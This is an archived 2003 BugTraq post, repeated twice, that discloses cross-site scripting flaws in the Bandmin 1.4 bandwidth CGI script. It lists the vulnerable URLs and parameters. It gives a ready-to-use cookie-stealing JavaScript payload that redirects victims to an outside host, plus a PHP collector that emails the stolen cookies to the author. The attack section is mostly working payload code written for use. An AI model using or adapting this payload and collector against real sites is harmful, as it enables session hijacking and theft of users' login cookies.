BugTraq
Back to list
|
Post reply
Bandmin 1.4 XSS Exploit
May 28 2003 04:38PM
silent needel (silentneedle hotmail com)
Bandmin 1.4 XSS Exploit by Silent Needle
A:BACKGROUND
Bandmin is a cgi script show you the bandwidth for the sites in the server.
B:DESCRIPTION
The cross site scripting allow you to print a html or javascript or others
in the webpage
when it just open not write in the page.
C:EXPLOIT
These are the URLs of the exploits:
1-there is two here
http://[site]/bandwidth/index.cgi?action=showmonth&year=[FIRST SCRIPT]
&month=[SECOND SCRIPT]
2-one here
http://[site]/bandwidth/index.cgi?action=showhost&month=May&year=2003&ho
st=
[THIRD SCRIPT]
And you can steal cookie by changing [*** script] to
<script>document.location='http://any-web-
site/cookies.php?'+document.cookie</script>
and in http://any-web-site/cookie.php put
----------------cookie.php-------------------
<?
mail("silentneedle (at) hotmail (dot) com [email concealed]","cookies from bandmin",$http_cookie);
echo $http_cookie;
?>
-----------------------------------------------
D:GREETZ
To : SP.IC , DR^^FUNNY , ARAB-HAK , ZALABOZA , OH SHE IS A LITTLE RUN
AWAY :)
E:CONTACT
Silent Needle
silentneedle (at) hotmail (dot) com [email concealed]
F:OH LONG NIGHT
Bye
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Bandmin 1.4 XSS Exploit by Silent Needle
A:BACKGROUND
Bandmin is a cgi script show you the bandwidth for the sites in the server.
B:DESCRIPTION
The cross site scripting allow you to print a html or javascript or others
in the webpage
when it just open not write in the page.
C:EXPLOIT
These are the URLs of the exploits:
1-there is two here
http://[site]/bandwidth/index.cgi?action=showmonth&year=[FIRST SCRIPT]
&month=[SECOND SCRIPT]
2-one here
http://[site]/bandwidth/index.cgi?action=showhost&month=May&year=2003&ho
st=
[THIRD SCRIPT]
And you can steal cookie by changing [*** script] to
<script>document.location='http://any-web-
site/cookies.php?'+document.cookie</script>
and in http://any-web-site/cookie.php put
----------------cookie.php-------------------
<?
mail("silentneedle (at) hotmail (dot) com [email concealed]","cookies from bandmin",$http_cookie);
echo $http_cookie;
?>
-----------------------------------------------
D:GREETZ
To : SP.IC , DR^^FUNNY , ARAB-HAK , ZALABOZA , OH SHE IS A LITTLE RUN
AWAY :)
E:CONTACT
Silent Needle
silentneedle (at) hotmail (dot) com [email concealed]
F:OH LONG NIGHT
Bye
[ reply ]